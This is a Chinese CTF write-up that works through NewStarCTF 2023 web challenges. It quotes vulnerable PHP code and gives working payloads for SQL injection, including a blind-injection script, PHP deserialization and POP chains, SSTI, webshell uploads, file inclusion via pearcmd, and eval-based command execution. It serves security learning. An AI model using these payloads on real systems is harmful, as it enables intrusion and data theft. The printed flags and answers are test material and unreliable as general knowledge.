目录

week1

泄漏的秘密

Begin of Upload

Begin of HTTP

ErrorFlask

Begin of PHP

R!C!E!

EasyLogin

week2

游戏高手

include 0。0

ez_sql

Unserialize？

Upload again!

R!!C!!E!!

week3

Include 🍐

medium_sql

POP Gadget

GenShin

week4

逃

---

week1

泄漏的秘密

访问 /robots.txt  可以得到  flag{r0bots_1s_s0_us3ful

访问 /www..zip 下载文件，有两个文件，放了flag
（目录扫描）

 flag{r0bots_1s_s0_us3ful_4nd_www.zip_1s_s0_d4ng3rous}

Begin of Upload

后缀名可以是php，比较简单，|
蚁剑连一下

flag{c31619ad-76d9-4bab-85c3-65675a57171a}

Begin of HTTP

先是需要get传参，然后post传参
post 传参的值查看源代码，base64解密

?ctf=1
secret=n3wst4rCTF2023g00000d

然后就是

最后本地用户感觉有点问题

要用 X-Real-IP: 127.0.0.1

ErrorFlask

随便传一些东西，会报错，flag就藏在里面

Begin of PHP

 <?php
error_reporting(0);
highlight_file(__FILE__);if(isset($_GET['key1']) && isset($_GET['key2'])){echo "=Level 1=<br>";if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){$flag1 = True;}else{die("nope,this is level 1");}
}if($flag1){echo "=Level 2=<br>";if(isset($_POST['key3'])){if(md5($_POST['key3']) === sha1($_POST['key3'])){$flag2 = True;}}else{die("nope,this is level 2");}
}if($flag2){echo "=Level 3=<br>";if(isset($_GET['key4'])){if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){$flag3 = True;}else{die("nope,this is level 3");}}
}if($flag3){echo "=Level 4=<br>";if(isset($_GET['key5'])){if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){$flag4 = True;}else{die("nope,this is level 4");}}
}if($flag4){echo "=Level 5=<br>";extract($_POST);foreach($_POST as $var){if(preg_match("/[a-zA-Z0-9]/",$var)){die("nope,this is level 5");}}if($flag5){echo file_get_contents("/flag");}else{die("nope,this is level 5");}
} 

?key1[]=1&key2[]=2&key4[]=1&key5=2024a

post : key3[]=1&flag5= ^

flag{4ffc2cc7-f66a-42cb-9655-7d9e49b55945}

主要是最后一步，本来以为是整个post传参的值不能出现字母和数字，但好像只是 flag5不能出现字母和数字，直接给flag5 赋值一个特殊的字符
也还可以通过数组绕过，flag5[]=  (空格) (虽然我也不晓得为什么这又可以通过数组绕)
（代码中不存在 $flag5 这个变量，但是有extract() ）

R!C!E!

 <?php
highlight_file(__FILE__);
if(isset($_POST['password'])&&isset($_POST['e_v.a.l'])){$password=md5($_POST['password']);$code=$_POST['e_v.a.l'];if(substr($password,0,6)==="c4d038"){if(!preg_match("/flag|system|pass|cat|ls/i",$code)){eval($code);}}
} 

114514 md5 加密后前六位为c4d038

e_v.a.1  要写成  e[v.a.1
php的一个特性，"["会被解析成“_”，并且在“[”之后不规范的字符都不会再被转化，

password=114514&e[v.a.l=eval($_POST[1]);&1=system('cat /flag');

flag{d6972660-584b-4eea-bc8e-2a958fe53e8c}

EasyLogin

随便输入密码抓包，发现对密码进行了加密，是MD5加密

注册再登进去有点莫名其妙,可以看到有个 111 是注册的用户名，
可能会存在admin用户名，但不知道密码，进行爆破

爆破出密码为 000000

登进去好像还是啥也没有

看了其他人的wp应该是抓包 在history中有个302重定向的包。在发送到repeater ，就可以得到flag
但是我用admin 和 000000  再重新抓包的时候查看history没有发现 302的包，有点奇怪

应该是环境的问题吧，别人的flag是在这个文件下发现的，但是我这里却是404，不晓得为啥

week2

游戏高手

游戏通关不了了，太难了

在控制台输入分数，继续返回到之前的页面玩游戏，可以发现分数变了，游戏结束就可以得到flag

include 0。0

过滤了两种过滤器，还有好多种过滤器，随便用一种

?file=php://filter/convert.iconv.utf8.utf16/resource=flag.php

ez_sql

sql注入类型的
进过测试，发现 or select 等一些东西都被过滤了，
但是没过滤大写，可以通过大小写绕过
可以测出有5列, 万能密码试一下

查表名
?id=-1' UNION SELECT 1,2,3,4,GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() %23

查列名
?id=-1' UNION SELECT 1,2,3,4,GROUP_CONCAT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='here_is_flag' %23

查数据
?id=-1' UNION SELECT 1,2,3,4,GROUP_CONCAT(flag) FROM here_is_flag %23

Unserialize？

<?php
highlight_file(__FILE__);
// Maybe you need learn some knowledge about deserialize?
class evil {private $cmd;public function __destruct(){if(!preg_match("/cat|tac|more|tail|base/i", $this->cmd)){@system($this->cmd);}}
}@unserialize($_POST['unser']);
?>

POST:   unser=O:4:"evil":1:{s:9:"%00evil%00cmd";s:4:"ls /";}
(列一下目录，注意$cmd 前面是 private)

虽然过滤了一些读取文件的命令，但还是有好多，尝试一些其他的

unser=O:4:"evil":1:{s:9:"%00evil%00cmd";s:35:"head /th1s_1s_fffflllll4444aaaggggg";}

Upload again!

先随便上传文件，然后bp抓包 ，
进过尝试可以发现 .htaccess可以上传
写入内容：  AddType application/x-httpd-php .png    可以上传成功
然后上传   1.png
但是 过滤了<? 需要绕过
<script language='php'>@eval($_POST[1])</script>  也可以上传成功

明明是上传成功了，但访问不了，总是报错，蚁剑也连不上
试了一下别人成功的方法，也是报错，感觉应该是环境的问题

R!!C!!E!!

提示有信息泄露，dirsearch扫描一下

使用工具：GitHack

在文件中下载了3个文件

<?php
highlight_file(__FILE__);
if (';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['star'])) {if(!preg_match('/high|get_defined_vars|scandir|var_dump|read|file|php|curent|end/i',$_GET['star'])){eval($_GET['star']);}
}

#!/bin/bash
echo "$FLAG" > /flag && \
export FLAG=not && FLAG=not && \
service apache2 restart && \
tail -f /dev/null

(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['star']))

这行代码表明需要进行  无参数RCE

getallheaders()：获取所有 HTTP 请求标头，但是该函数只能在Apache环境下使用

array_flip()：交换数组中的键和值，成功时返回交换后的数组，如果失败返回 NULL

array_rand()：从数组中随机取出一个或多个单元，如果只取出一个(默认为1)，array_rand() 返回随机单元的键名。

?star=print_r(getallheaders());

然后bp抓包添加请求头
flag: system("ls /");

再用array_flip  和array_rand  得到system("ls /");
包裹上 eval  ,执行命令

?star=eval(array_rand(array_flip(getallheaders())));

多尝试几遍，发现执行了命令

week3

Include 🍐

之前写过，利用pearcmd.php

直接传参：

?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=eval($_POST[1]);?>+/tmp/shell.php

到/tmp/shell.php文件下进行  rce
文件包含题(进阶)-CSDN博客

medium_sql

万能密码尝试一下

刚开始试着的时候，一直没发现竟然是布尔盲注，我说怎么一直没有回显，一直检查是不是哪里语法有问题
需要写脚本，虽然我写的脚本很low，但也勉强能运行

import time
import requestsdic='1234_567890{}qwer-tyuiopasdfghjklzxcvbnm'
url='http://74efb8e1-f799-4d94-b4aa-a73f536b2dad.node5.buuoj.cn:81/'# payload="?id=TMP0919' And if((oRd(suBstr((SELECT TABLE_NAME FroM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() LIMIT 1,1),{0},1)))={1},1,0)%23"
# 改一下limit  第一张表为：grades  第二张表为 here_is_flag# payload="?id=TMP0919' And if((oRd(suBstr((SELECT ColuMN_NAME FroM INFORMATION_SCHEMA.COlumnS WHERE TABLE_naMe='here_is_flag' LIMIT 0,1),{0},1)))={1},1,0)%23"
# 列名为 flagpayload="?id=TMP0919' And if((oRd(suBstr((SELECT flag FroM here_is_flag LIMIT 0,1),{0},1)))={1},1,0)%23"flag=''
column_name=''
tb_name=''URL=url+payload
for i in range(1,60):for j in dic:res=requests.get(url=URL.format(i,ord(j)))# print(res.text)if 'TMP0919' in res.text:# tb_name+=j# column_name+=jflag+=jprint(j)break# print("表名为：{}".format(tb_name))# print("列名为：{}".format(column_name))print("flag为:{}".format(flag))
#  第一次设的长度太短了，还有一部分没跑出来，有点无语 flag{55d9507f-1ee9-44d8-8cb6-62fd080faa
#  flag{55d9507f-1ee9-44d8-8cb6-62fd080faa15}

POP Gadget

 <?php
highlight_file(__FILE__);class Begin{public $name;public function __destruct(){if(preg_match("/[a-zA-Z0-9]/",$this->name)){echo "Hello";}else{echo "Welcome to NewStarCTF 2023!";}}
}class Then{private $func;public function __toString(){($this->func)();return "Good Job!";}}class Handle{protected $obj;public function __call($func, $vars){$this->obj->end();}}class Super{protected $obj;public function __invoke(){$this->obj->getStr();}public function end(){die("==GAME OVER==");}
}class CTF{public $handle;public function end(){unset($this->handle->log);}}class WhiteGod{public $func;public $var;public function __unset($var){($this->func)($this->var);    }
}@unserialize($_POST['pop']); 

pop链：

  Begin  __destruct->Then  __toString ->Supei  __invoke-> Handle  __call  ->CTF __end()
   ->Whitegod  __unset

$a=new Begin();
$a->name=new Then();
$a->name->func=new Super();
$a->name->func->obj=new Handle();
$a->name->func->obj->obj=new CTF();
$a->name->func->obj->obj->handle=new WhiteGod();
$a->name->func->obj->obj->handle->func='system';
$a->name->func->obj->obj->handle->var='ls /';echo urlencode(serialize($a));

pop=O:5:"Begin":1:{s:4:"name";O:4:"Then":1:{s:4:"func";O:5:"Super":1:{s:3:"obj";O:6:"Handle":1:{s:3:"obj";O:3:"CTF":1:{s:6:"handle";O:8:"WhiteGod":2:{s:4:"func";s:6:"system";s:3:"var";s:4:"ls /";}}}}}}Hello

pop=O:5:"Begin":1:{s:4:"name";O:4:"Then":1:{s:4:"func";O:5:"Super":1:{s:3:"obj";O:6:"Handle":1:{s:3:"obj";O:3:"CTF":1:{s:6:"handle";O:8:"WhiteGod":2:{s:4:"func";s:6:"system";s:3:"var";s:9:"cat /flag";}}}}}}

GenShin

抓包，可以看到有目录信息

访问到页面

尝试传参试试  ?name=admin

?name={%print("".__class__)%}   存在ssti注入

?name={%print("".__class__.__base__.__subclasses__())%}
找能够利用的函数  

?name={%print("".__class__.__base__.__subclasses__()[132]["__in"+"it__"].__globals__)%}

参考：[wp]NewStarCTF 2023 WEEK3|WEB-CSDN博客

?name={%print""|attr("__class__")|attr("__base__")|attr("__subclasses__")()|attr(132)|attr("__in"+"it__")|attr("__globals__")|attr("get")("__builtins__")|attr("get")("eval")("eval(chr(95)%2bchr(95)%2bchr(105)%2bchr(109)%2bchr(112)%2bchr(111)%2bchr(114)%2bchr(116)%2bchr(95)%2bchr(95)%2bchr(40)%2bchr(39)%2bchr(111)%2bchr(115)%2bchr(39)%2bchr(41)%2bchr(46)%2bchr(112)%2bchr(111)%2bchr(112)%2bchr(101)%2bchr(110)%2bchr(40)%2bchr(39)%2bchr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%2bchr(39)%2bchr(41)%2bchr(46)%2bchr(114)%2bchr(101)%2bchr(97)%2bchr(100)%2bchr(40)%2bchr(41))")%}

这个也可以，之前一直试的这个，一直不能成功，突然又可以了，可能之前哪里格式错了

?name={%print("".__class__.__base__.__subclasses__()[132]["__in"+"it__"].__globals__["po""pen"]("ls /").read())%}

week4

逃

 <?php
highlight_file(__FILE__);
function waf($str){return str_replace("bad","good",$str);
}class GetFlag {public $key;public $cmd = "whoami";public function __construct($key){$this->key = $key;}public function __destruct(){system($this->cmd);}
}unserialize(waf(serialize(new GetFlag($_GET['key'])))); www-data flag{6edd79e9-fec6-4a7b-8523-3a403dd91a0e} 

字符串逃逸，每次bad -> good 就可以逃逸出一个字符
cmd=whoami,无法改变，需要自己造一个cmd，进行反序列化

";s:3:"cmd";s:4:"ls /";}  共有24个字符，所以需要逃逸24个

?key=badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbad";s:3:"cmd";s:4:"ls /";}

?key=badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbad";s:3:"cmd";s:9:"cat /flag";}